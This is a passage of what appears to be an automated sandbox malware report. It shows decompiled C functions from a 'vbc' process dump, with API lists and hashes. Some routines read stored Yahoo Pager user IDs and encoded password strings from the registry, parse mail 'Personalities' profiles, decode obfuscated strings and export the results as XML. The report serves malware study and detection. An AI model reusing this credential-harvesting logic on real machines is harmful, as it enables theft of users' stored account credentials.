                                                              • strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,74B04DE0), ref: 0040797A
                                                                • Part of subcall function 00407D89: _itoa.MSVCRT ref: 00407DAA
                                                              • strlen.MSVCRT ref: 00407998
                                                              • LoadStringA.USER32 ref: 004079C8
                                                              • memcpy.MSVCRT ref: 00407A07
                                                                • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078A5
                                                                • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078C3
                                                                • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078E1
                                                                • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078F1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ??2@$LoadString_itoamemcpystrcpystrlen
                                                              • String ID: strings
                                                              • API String ID: 1748916193-3030018805
                                                              • Opcode ID: bf392a6dacac5d0c9eb1169d992c8844a823b81d6c84b2abf61d961779fc3ee1
                                                              • Instruction ID: bfec9983b2359add980c5e43b0d452c2fda20e15e3ba6c634c10b5a9b6e313b6
                                                              • Opcode Fuzzy Hash: bf392a6dacac5d0c9eb1169d992c8844a823b81d6c84b2abf61d961779fc3ee1
                                                              • Instruction Fuzzy Hash: F73189B1A8C101BFD7159B59FD80DB63377EB84304710807AE902A7AB1E639B851CF9D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040329E(void* __fp0, intOrPtr _a4) {
                                                              				int _v8;
                                                              				char _v12;
                                                              				char _v13;
                                                              				char _v14;
                                                              				char _v15;
                                                              				void _v1035;
                                                              				char _v1036;
                                                              				char _v1968;
                                                              				char _v2900;
                                                              				void* __esi;
                                                              				void* _t23;
                                                              				int _t30;
                                                              				char* _t31;
                                                              				CHAR* _t49;
                                                              				void* _t50;
                                                              				void* _t55;
                                                              
                                                              				_t62 = __fp0;
                                                              				_t49 = _a4 + 0xd2a;
                                                              				if( *_t49 != 0) {
                                                              					_t52 =  &_v1968;
                                                              					E004021D8( &_v1968);
                                                              					if(E0040314D(_t52, _t49, 0) != 0) {
                                                              						E00402407(_t52, __fp0, _a4);
                                                              					}
                                                              					_v1036 = 0;
                                                              					memset( &_v1035, 0, 0x400);
                                                              					_t30 = GetPrivateProfileSectionA("Personalities",  &_v1036, 0x3fe, _t49);
                                                              					if(_t30 <= 0) {
                                                              						L11:
                                                              						return _t30;
                                                              					} else {
                                                              						_v12 = 0;
                                                              						_v13 = 0;
                                                              						_v14 = 0;
                                                              						_v15 = 0;
                                                              						_t50 = 0;
                                                              						_t31 =  &_v1036;
                                                              						while(1) {
                                                              							_t30 = strlen(_t31);
                                                              							_v8 = _t30;
                                                              							if(_t30 <= 0) {
                                                              								goto L11;
                                                              							}
                                                              							_t54 =  &_v2900;
                                                              							E004021D8( &_v2900);
                                                              							if(strchr(_t55 + _t50 - 0x408, 0x3d) != 0 && E0040314D(_t54, _a4 + 0xd2a, _t34 + 1) != 0) {
                                                              								E00402407(_t54, _t62, _a4);
                                                              							}
                                                              							_t30 = _v8;
                                                              							_t50 = _t50 + _t30 + 1;
                                                              							if(_t50 >= 0x3ff) {
                                                              								goto L11;
                                                              							} else {
                                                              								_t31 = _t55 + _t50 - 0x408;
                                                              								continue;
                                                              							}
                                                              						}
                                                              						goto L11;
                                                              					}
                                                              				}
                                                              				return _t23;
                                                              			}



















                                                              0x0040329e
                                                              0x004032ac
                                                              0x004032b6
                                                              0x004032bd
                                                              0x004032c3
                                                              0x004032d3
                                                              0x004032da
                                                              0x004032da
                                                              0x004032ec
                                                              0x004032f2
                                                              0x0040330c
                                                              0x00403314
                                                              0x00403390
                                                              0x00000000
                                                              0x00403316
                                                              0x00403316
                                                              0x00403319
                                                              0x0040331c
                                                              0x0040331f
                                                              0x00403322
                                                              0x00403324
                                                              0x00403382
                                                              0x00403383
                                                              0x0040338a
                                                              0x0040338e
                                                              0x00000000
                                                              0x00000000
                                                              0x0040332c
                                                              0x00403332
                                                              0x0040334a
                                                              0x00403367
                                                              0x00403367
                                                              0x0040336c
                                                              0x0040336f
                                                              0x00403379
                                                              0x00000000
                                                              0x0040337b
                                                              0x0040337b
                                                              0x00000000
                                                              0x0040337b
                                                              0x00403379
                                                              0x00000000
                                                              0x00403382
                                                              0x00403314
                                                              0x00403394

                                                              APIs
                                                                • Part of subcall function 0040314D: strchr.MSVCRT ref: 00403262
                                                              • memset.MSVCRT ref: 004032F2
                                                              • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 0040330C
                                                              • strchr.MSVCRT ref: 00403341
                                                                • Part of subcall function 00402407: _mbsicmp.MSVCRT ref: 0040243F
                                                              • strlen.MSVCRT ref: 00403383
                                                                • Part of subcall function 00402407: _mbscmp.MSVCRT ref: 0040241B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                              • String ID: Personalities
                                                              • API String ID: 2103853322-4287407858
                                                              • Opcode ID: e3fa63d939a05486987fea06324786367eab17663f8cebe7d255cc1b6eb769cc
                                                              • Instruction ID: ece583472a64ba9cf1aca627ef0740b0f3020b1d2d3fce26046d940835a048de
                                                              • Opcode Fuzzy Hash: e3fa63d939a05486987fea06324786367eab17663f8cebe7d255cc1b6eb769cc
                                                              • Instruction Fuzzy Hash: 8C21BA72A00108AADB119F69DD81ADE7F6C9F50349F0040BBEA45F3181DA38EF86866D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00410F79(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                              				void* _v8;
                                                              				void _v1031;
                                                              				char _v1032;
                                                              				void* __esi;
                                                              				void* _t25;
                                                              				int _t26;
                                                              
                                                              				_t25 = __ecx;
                                                              				_t26 = 0;
                                                              				_v1032 = 0;
                                                              				memset( &_v1031, 0, 0x3ff);
                                                              				if(E0040EB3F(0x80000001, "Software\\Yahoo\\Pager",  &_v8) == 0) {
                                                              					if(E0040EB80(0x3ff, _t25, _v8, "Yahoo! User ID", _a4) == 0 && E0040EB80(0x3ff, _t25, _v8, "EOptions string",  &_v1032) == 0) {
                                                              						_t26 = E004112A1(_t25, _a8, _a4,  &_v1032);
                                                              					}
                                                              					RegCloseKey(_v8);
                                                              				}
                                                              				return _t26;
                                                              			}









                                                              0x00410f79
                                                              0x00410f8a
                                                              0x00410f94
                                                              0x00410f9b
                                                              0x00410fb8
                                                              0x00410fd1
                                                              0x00411002
                                                              0x00411002
                                                              0x00411007
                                                              0x00411007
                                                              0x00411012

                                                              APIs
                                                              • memset.MSVCRT ref: 00410F9B
                                                                • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00411007
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseOpenQueryValuememset
                                                              • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                              • API String ID: 1830152886-1703613266
                                                              • Opcode ID: eea9cffd790e45d2014a53520a97df09f09eacd0c9e47dd03152d544afa7cf5a
                                                              • Instruction ID: 4a1c6cf285358ebc60a306e6e4607d202acce7e44454db846991f846a9516d87
                                                              • Opcode Fuzzy Hash: eea9cffd790e45d2014a53520a97df09f09eacd0c9e47dd03152d544afa7cf5a
                                                              • Instruction Fuzzy Hash: 820184B5A00118BBDB10A6569D02FDE7A6C9B94399F004076FF08F2251E2389F95C698
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00405F41(long __eax, struct HWND__* _a4) {
                                                              				char _v1028;
                                                              				char _v2052;
                                                              				void* __edi;
                                                              				long _t15;
                                                              
                                                              				_t15 = __eax;
                                                              				if(__eax == 0) {
                                                              					_t15 = GetLastError();
                                                              				}
                                                              				E00405E46(_t15,  &_v1028);
                                                              				sprintf( &_v2052, "Error %d: %s", _t15,  &_v1028);
                                                              				return MessageBoxA(_a4,  &_v2052, "Error", 0x30);
                                                              			}







                                                              0x00405f4b
                                                              0x00405f4f
                                                              0x00405f57
                                                              0x00405f57
                                                              0x00405f60
                                                              0x00405f79
                                                              0x00405f9a

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastMessagesprintf
                                                              • String ID: Error$Error %d: %s
                                                              • API String ID: 1670431679-1552265934
                                                              • Opcode ID: 9a2ad0e70752bb447b178d956355c706b7f152369d8ca83d74a421e60f1b41e3
                                                              • Instruction ID: dfdfd8ae3da356d4892d02c8fdfc7d0b76dc1d64d686e07e92b09a376f71314b
                                                              • Opcode Fuzzy Hash: 9a2ad0e70752bb447b178d956355c706b7f152369d8ca83d74a421e60f1b41e3
                                                              • Instruction Fuzzy Hash: 9BF0A7B640010876CB10A764DC05FDA76BCAB44704F1440B6BA05E2141EAB4DB458FAC
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 68%
                                                              			E0040F037(intOrPtr _a4) {
                                                              				_Unknown_base(*)()* _t3;
                                                              				void* _t7;
                                                              				struct HINSTANCE__* _t8;
                                                              
                                                              				_t7 = 0;
                                                              				_t8 = LoadLibraryA("shlwapi.dll");
                                                              				_t3 = GetProcAddress(_t8, "SHAutoComplete");
                                                              				if(_t3 != 0) {
                                                              					_t7 =  *_t3(_a4, 0x10000001);
                                                              				}
                                                              				FreeLibrary(_t8);
                                                              				return _t7;
                                                              			}






                                                              0x0040f03e
                                                              0x0040f046
                                                              0x0040f04e
                                                              0x0040f056
                                                              0x0040f063
                                                              0x0040f063
                                                              0x0040f066
                                                              0x0040f070

                                                              APIs
                                                              • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,774148C0,00405C41,00000000), ref: 0040F040
                                                              • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040F04E
                                                              • FreeLibrary.KERNEL32(00000000), ref: 0040F066
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadProc
                                                              • String ID: SHAutoComplete$shlwapi.dll
                                                              • API String ID: 145871493-1506664499
                                                              • Opcode ID: 00be263e50752a8f479fbc1a88640afc62a4183cc8ad6fe6345b1c509fc360a9
                                                              • Instruction ID: e435a3077eadc7ffcc94e3fda903fcc6a6103b68d0c251917c13f6f883115a60
                                                              • Opcode Fuzzy Hash: 00be263e50752a8f479fbc1a88640afc62a4183cc8ad6fe6345b1c509fc360a9
                                                              • Instruction Fuzzy Hash: 70D0C2323002106B96605B326C0CAEB2D55EBC47527048032F505E1250EB648A86C1A8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 87%
                                                              			E00407406(char* __eax, intOrPtr* _a4, char _a8) {
                                                              				signed int _v8;
                                                              				int _v12;
                                                              				char* _v16;
                                                              				char _v20;
                                                              				signed int* _v24;
                                                              				char _v28;
                                                              				void _v284;
                                                              				char _v540;
                                                              				char _v1068;
                                                              				void _v3115;
                                                              				char _v3116;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t35;
                                                              				signed int _t36;
                                                              				signed int _t40;
                                                              				signed int* _t61;
                                                              				char _t69;
                                                              				char* _t74;
                                                              				char* _t75;
                                                              				intOrPtr* _t76;
                                                              				signed int _t78;
                                                              				int _t80;
                                                              				void* _t83;
                                                              				void* _t84;
                                                              				signed int _t89;
                                                              
                                                              				_t74 = __eax;
                                                              				_t35 = strlen(__eax);
                                                              				_t78 = _t35;
                                                              				_t36 = _t35 & 0x80000001;
                                                              				if(_t36 < 0) {
                                                              					_t36 = (_t36 - 0x00000001 | 0xfffffffe) + 1;
                                                              					_t89 = _t36;
                                                              				}
                                                              				if(_t89 != 0 || _t78 <= 0x20) {
                                                              					return _t36;
                                                              				} else {
                                                              					_v3116 = 0;
                                                              					memset( &_v3115, 0, 0x7ff);
                                                              					_v8 = _v8 & 0x00000000;
                                                              					_t61 = _a4 + 4;
                                                              					_t40 =  *_t61 | 0x00000001;
                                                              					if(_t78 <= 4) {
                                                              						L7:
                                                              						_t79 =  &_v1068;
                                                              						E004046D7( &_v1068);
                                                              						if(E004047A0( &_v1068, _t93) != 0) {
                                                              							_v20 = _v8;
                                                              							_v16 =  &_v3116;
                                                              							_v28 = 0x10;
                                                              							_v24 = _t61;
                                                              							if(E00404811(_t79,  &_v20,  &_v28,  &_v12) != 0) {
                                                              								_t80 = _v12;
                                                              								if(_t80 > 0xff) {
                                                              									_t80 = 0xff;
                                                              								}
                                                              								_v540 = 0;
                                                              								_v284 = 0;
                                                              								memcpy( &_v284, _v8, _t80);
                                                              								_t27 =  &_a8; // 0x407626
                                                              								_t75 =  &_v540;
                                                              								 *((char*)(_t84 + _t80 - 0x118)) = 0;
                                                              								E004060D0(0xff, _t75,  *_t27);
                                                              								 *((intOrPtr*)( *_a4))(_t75);
                                                              								LocalFree(_v8);
                                                              							}
                                                              						}
                                                              						return E004047F1( &_v1068);
                                                              					}
                                                              					_t76 = _t74 + 5;
                                                              					_t83 = (_t78 + 0xfffffffb >> 1) + 1;
                                                              					do {
                                                              						_t69 = ( *((intOrPtr*)(_t76 - 1)) - 0x00000001 << 0x00000004 |  *_t76 - 0x00000021) - _t40;
                                                              						_t40 = _t40 * 0x10ff5;
                                                              						_t76 = _t76 + 2;
                                                              						_v8 = _v8 + 1;
                                                              						_t83 = _t83 - 1;
                                                              						_t93 = _t83;
                                                              						 *((char*)(_t84 + _v8 - 0xc28)) = _t69;
                                                              					} while (_t83 != 0);
                                                              					goto L7;
                                                              				}
                                                              			}






























                                                              0x00407412
                                                              0x00407415
                                                              0x0040741a
                                                              0x0040741c
                                                              0x00407422
                                                              0x00407428
                                                              0x00407428
                                                              0x00407428
                                                              0x00407429
                                                              0x0040754a
                                                              0x00407438
                                                              0x00407446
                                                              0x0040744d
                                                              0x00407455
                                                              0x00407459
                                                              0x00407461
                                                              0x00407467
                                                              0x0040749b
                                                              0x0040749b
                                                              0x004074a1
                                                              0x004074ad
                                                              0x004074b6
                                                              0x004074bf
                                                              0x004074d0
                                                              0x004074d7
                                                              0x004074e1
                                                              0x004074e3
                                                              0x004074ed
                                                              0x004074ef
                                                              0x004074ef
                                                              0x004074fc
                                                              0x00407503
                                                              0x0040750a
                                                              0x0040750f
                                                              0x00407512
                                                              0x00407518
                                                              0x00407520
                                                              0x00407530
                                                              0x00407535
                                                              0x00407535
                                                              0x004074e1
                                                              0x00000000
                                                              0x00407541
                                                              0x0040746e
                                                              0x00407471
                                                              0x00407472
                                                              0x00407484
                                                              0x00407486
                                                              0x0040748d
                                                              0x0040748e
                                                              0x00407491
                                                              0x00407491
                                                              0x00407492
                                                              0x00407492
                                                              0x00000000
                                                              0x00407472

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeLocalmemcpymemsetstrlen
                                                              • String ID: &v@
                                                              • API String ID: 3110682361-3426253984
                                                              • Opcode ID: 9a1ef4ca1be38dacd8a40183f10fd2ba3c83eed1e3cc7d309a54d2d6fc5753ae
                                                              • Instruction ID: 0225f7a5d6cb17f6a7661d1d380ab710e59dbb599c3936da0c6da93344c8566d
                                                              • Opcode Fuzzy Hash: 9a1ef4ca1be38dacd8a40183f10fd2ba3c83eed1e3cc7d309a54d2d6fc5753ae
                                                              • Instruction Fuzzy Hash: B731F772D0411DABDB10DB68CC81BDEBBB8EF45318F1001B6E645B3281DA78AE858B95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 84%
                                                              			E00409695(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                              				void _v259;
                                                              				char _v260;
                                                              				signed int _t34;
                                                              				char* _t45;
                                                              				void* _t47;
                                                              
                                                              				E00405EFD(_a4, "<item>\r\n");
                                                              				_t34 = 0;
                                                              				if( *((intOrPtr*)(__edi + 0x20)) > 0) {
                                                              					do {
                                                              						_v260 = 0;
                                                              						memset( &_v259, 0, 0xfe);
                                                              						E0040F09D( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4),  *((intOrPtr*)(__edi + 0x4c))),  *((intOrPtr*)(__edi + 0x50)));
                                                              						_t45 =  &_v260;
                                                              						E00409018(_t45,  *((intOrPtr*)(( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4) << 4) +  *((intOrPtr*)(__edi + 0x34)) + 0xc)));
                                                              						sprintf( *(__edi + 0x54), "<%s>%s</%s>\r\n", _t45,  *((intOrPtr*)(__edi + 0x50)), _t45);
                                                              						E00405EFD(_a4,  *(__edi + 0x54));
                                                              						_t47 = _t47 + 0x28;
                                                              						_t34 = _t34 + 1;
                                                              					} while (_t34 <  *((intOrPtr*)(__edi + 0x20)));
                                                              				}
                                                              				return E00405EFD(_a4, "</item>\r\n");
                                                              			}








                                                              0x004096a7
                                                              0x004096ac
                                                              0x004096b3
                                                              0x004096b6
                                                              0x004096c4
                                                              0x004096cb
                                                              0x004096e7
                                                              0x004096f6
                                                              0x004096fc
                                                              0x00409710
                                                              0x0040971b
                                                              0x00409720
                                                              0x00409723
                                                              0x00409724
                                                              0x00409729
                                                              0x0040973b

                                                              APIs
                                                                • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,74B04DE0,00000000,?,?,004092ED,00000001,00412B1C,74B04DE0), ref: 00405F17
                                                              • memset.MSVCRT ref: 004096CB
                                                                • Part of subcall function 0040F09D: memcpy.MSVCRT ref: 0040F10B
                                                                • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                              • sprintf.MSVCRT ref: 00409710
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileWrite_strlwrmemcpymemsetsprintfstrcpystrlen
                                                              • String ID: <%s>%s</%s>$</item>$<item>
                                                              • API String ID: 3200591283-2769808009
                                                              • Opcode ID: 07c18c0e4a87831351b3b02fe01daf5ffa13d64f31dc98592b1a2e626d7dc146
                                                              • Instruction ID: f0c093cdac9801847eaa7418f237768de61d650e358e632480a4b045718b8cde
                                                              • Opcode Fuzzy Hash: 07c18c0e4a87831351b3b02fe01daf5ffa13d64f31dc98592b1a2e626d7dc146
                                                              • Instruction Fuzzy Hash: FE11E731500515BFC711AF25CC42E967B64FF04318F10006AF549369A2EB76BA64DFD8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00407BF9(void* __esi, struct HWND__* _a4, signed int _a8) {
                                                              				intOrPtr _v12;
                                                              				struct tagPOINT _v20;
                                                              				struct tagRECT _v36;
                                                              				int _t27;
                                                              				struct HWND__* _t30;
                                                              				struct HWND__* _t32;
                                                              
                                                              				_t30 = _a4;
                                                              				if((_a8 & 0x00000001) != 0) {
                                                              					_t32 = GetParent(_t30);
                                                              					GetWindowRect(_t30,  &_v20);
                                                              					GetClientRect(_t32,  &_v36);
                                                              					MapWindowPoints(0, _t32,  &_v20, 2);
                                                              					_t27 = _v36.right - _v12 - _v36.left;
                                                              					_v20.x = _t27;
                                                              					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
                                                              				}
                                                              				if((_a8 & 0x00000002) != 0) {
                                                              					E00406560(_t30);
                                                              				}
                                                              				return 1;
                                                              			}









                                                              0x00407c04
                                                              0x00407c07
                                                              0x00407c11
                                                              0x00407c18
                                                              0x00407c23
                                                              0x00407c33
                                                              0x00407c41
                                                              0x00407c49
                                                              0x00407c4f
                                                              0x00407c55
                                                              0x00407c5a
                                                              0x00407c5d
                                                              0x00407c62
                                                              0x00407c68

                                                              APIs
                                                              • GetParent.USER32(?), ref: 00407C0B
                                                              • GetWindowRect.USER32 ref: 00407C18
                                                              • GetClientRect.USER32 ref: 00407C23
                                                              • MapWindowPoints.USER32 ref: 00407C33
                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00407C4F
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Window$Rect$ClientParentPoints
                                                              • String ID:
                                                              • API String ID: 4247780290-0
                                                              • Opcode ID: 7bea04c1b6e52cb4f5c6b6cbc8acbaaab4948e977a1f04226da639ece1b7c51f
                                                              • Instruction ID: 06ac4e87c023cdd11bbb76a881eefb098f7857fbb12a9e12d40a619b69e20d01
                                                              • Opcode Fuzzy Hash: 7bea04c1b6e52cb4f5c6b6cbc8acbaaab4948e977a1f04226da639ece1b7c51f
                                                              • Instruction Fuzzy Hash: A7014C32800129BBDB119BA5DD89EFF7FBCEF46750F048129F901E2150D7B89541CBA9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040A4C8(void* __eax) {
                                                              				void* __esi;
                                                              				void* _t16;
                                                              				void* _t33;
                                                              				void* _t38;
                                                              				void* _t41;
                                                              
                                                              				_t41 = __eax;
                                                              				_t16 = E00401033();
                                                              				if(_t16 == 0x5cb8) {
                                                              					SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0xb, 0, 0);
                                                              					E00405E2C();
                                                              					 *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)) + 0x28)) = 0;
                                                              					SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0x1009, 0, 0);
                                                              					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)))) + 0x5c))(_t38, _t33);
                                                              					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)))) + 0x74))(1);
                                                              					E0040A437(_t41);
                                                              					SetCursor( *0x416b98);
                                                              					SetFocus( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184));
                                                              					return SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0xb, 1, 0);
                                                              				}
                                                              				return _t16;
                                                              			}








                                                              0x0040a4c9
                                                              0x0040a4cb
                                                              0x0040a4d5
                                                              0x0040a4f5
                                                              0x0040a4f7
                                                              0x0040a504
                                                              0x0040a518
                                                              0x0040a522
                                                              0x0040a52f
                                                              0x0040a532
                                                              0x0040a53d
                                                              0x0040a54f
                                                              0x00000000
                                                              0x0040a569
                                                              0x0040a56b

                                                              APIs
                                                              • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040A4F5
                                                                • Part of subcall function 00405E2C: LoadCursorA.USER32 ref: 00405E33
                                                                • Part of subcall function 00405E2C: SetCursor.USER32(00000000,?,0040BAC6), ref: 00405E3A
                                                              • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040A518
                                                                • Part of subcall function 0040A437: sprintf.MSVCRT ref: 0040A45D
                                                                • Part of subcall function 0040A437: sprintf.MSVCRT ref: 0040A487
                                                                • Part of subcall function 0040A437: strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A49A
                                                                • Part of subcall function 0040A437: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040A4C0
                                                              • SetCursor.USER32(?,?,0040B6B6), ref: 0040A53D
                                                              • SetFocus.USER32(?,?,?,0040B6B6), ref: 0040A54F
                                                              • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040A566
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessageSend$Cursor$sprintf$FocusLoadstrcat
                                                              • String ID:
                                                              • API String ID: 2210206837-0
                                                              • Opcode ID: d04c02dfd2683b57df494b0aa3d26c888530678e73924bd562102cacfecd4f7b
                                                              • Instruction ID: 5ceab2a0550c6f7be61398745e2f8fe4621b0361104972d0b8848fcf02267a2c
                                                              • Opcode Fuzzy Hash: d04c02dfd2683b57df494b0aa3d26c888530678e73924bd562102cacfecd4f7b
                                                              • Instruction Fuzzy Hash: 12116DB1200600EFD722AB74DC85FAA77EDFF48344F0644B9F1599B2B1CA716D018B10
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00409867(intOrPtr* __ecx, intOrPtr _a4) {
                                                              				void _v259;
                                                              				char _v260;
                                                              				void _v515;
                                                              				char _v516;
                                                              				void* __esi;
                                                              				void* _t17;
                                                              				intOrPtr* _t26;
                                                              				char* _t28;
                                                              
                                                              				_t26 = __ecx;
                                                              				_v260 = 0;
                                                              				memset( &_v259, 0, 0xfe);
                                                              				_v516 = 0;
                                                              				memset( &_v515, 0, 0xfe);
                                                              				E00405EFD(_a4, "<?xml version=\"1.0\"  encoding=\"ISO-8859-1\" ?>\r\n");
                                                              				_t17 =  *((intOrPtr*)( *_t26 + 0x20))();
                                                              				_t28 =  &_v260;
                                                              				E00409018(_t28, _t17);
                                                              				sprintf( &_v516, "<%s>\r\n", _t28);
                                                              				return E00405EFD(_a4,  &_v516);
                                                              			}











                                                              0x00409881
                                                              0x00409883
                                                              0x0040988a
                                                              0x00409899
                                                              0x004098a0
                                                              0x004098ad
                                                              0x004098b9
                                                              0x004098bd
                                                              0x004098c3
                                                              0x004098d7
                                                              0x004098f1

                                                              APIs
                                                              • memset.MSVCRT ref: 0040988A
                                                              • memset.MSVCRT ref: 004098A0
                                                                • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,74B04DE0,00000000,?,?,004092ED,00000001,00412B1C,74B04DE0), ref: 00405F17
                                                                • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                              • sprintf.MSVCRT ref: 004098D7
                                                              Strings
                                                              • <%s>, xrefs: 004098D1
                                                              • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 004098A5
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
